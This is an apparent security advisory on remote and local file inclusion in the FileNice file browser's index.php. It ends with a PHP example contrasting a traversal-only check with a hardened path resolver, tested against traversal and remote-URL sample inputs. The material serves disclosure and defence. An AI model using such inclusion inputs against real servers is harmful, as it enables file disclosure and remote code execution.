Vendor: FileNice file browser
By: e.wiZz!
CVSS: 8.8 HIGH
Remote File Inclusion (RFI) & Local File Inclusion (LFI)
CWE: 98
Product Name: FileNice file browser
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020
FileNice file browser RFI&LFI
FileNice file browser is vulnerable to RFI and LFI attacks. The index.php file contains a security check for directory traversal, but it has no check for RFI. An attacker can exploit this vulnerability by sending a malicious URL to the vulnerable application. The URL can contain a remote shell or a local file inclusion payload, which can be used to gain access to the system.
Mitigation:
Input validation should be used to prevent RFI and LFI attacks. All user-supplied input should be validated and filtered before being used in the application. Additionally, the application should be configured to only allow access to files and directories that are necessary for the application to function.
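
The gap described above, a traversal check that never looks for a URL, shown next to a resolver that only returns files inside one base directory. This is an added example, not FileNice's own code (the page does not show index.php); the function names, the scratch directory and the sample inputs are assumptions constructed for illustration.

```php
<?php
// Added example. The base directory, function names and sample inputs are
// constructed for illustration; none of this is FileNice's own code.

// A traversal-only check of the kind the advisory describes: it looks for
// "..", so a value that is a URL passes untouched.
function traversal_only_check(string $path): bool
{
    return strpos($path, '..') === false;
}

// Hardened resolver: returns the canonical path of a regular file inside
// $base, or null for anything else.
function resolve_inside_base(string $base, string $path): ?string
{
    // Reject empty input, NUL bytes and anything that starts with a scheme
    // prefix (http:, ftp:, ...); names beginning "word:" are refused too.
    if ($path === '' || strpos($path, "\0") !== false
        || preg_match('/^[a-z][a-z0-9+.\-]*:/i', $path)) {
        return null;
    }
    $root = realpath($base);
    $real = realpath($base . DIRECTORY_SEPARATOR . $path);
    if ($root === false || $real === false) {
        return null; // base or target does not exist on the local disk
    }
    // Compare canonical paths, so symlinks and "../" cannot leave $root.
    $prefix = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return is_file($real) ? $real : null;
}

// Constructed demo: one real file in a scratch directory, three inputs.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'fn_demo_' . getmypid();
@mkdir($base);
file_put_contents($base . DIRECTORY_SEPARATOR . 'notes.txt', "demo\n");

$inputs = ['notes.txt', '../outside.txt', 'http://example.invalid/remote.txt'];
foreach ($inputs as $in) {
    printf("%-36s traversal-only=%-6s hardened=%s\n", $in,
        traversal_only_check($in) ? 'pass' : 'reject',
        resolve_inside_base($base, $in) === null ? 'reject' : 'allow');
}
unlink($base . DIRECTORY_SEPARATOR . 'notes.txt');
rmdir($base);
```

Keeping PHP's `allow_url_include` setting at `Off`, its default, is a second layer behind this check.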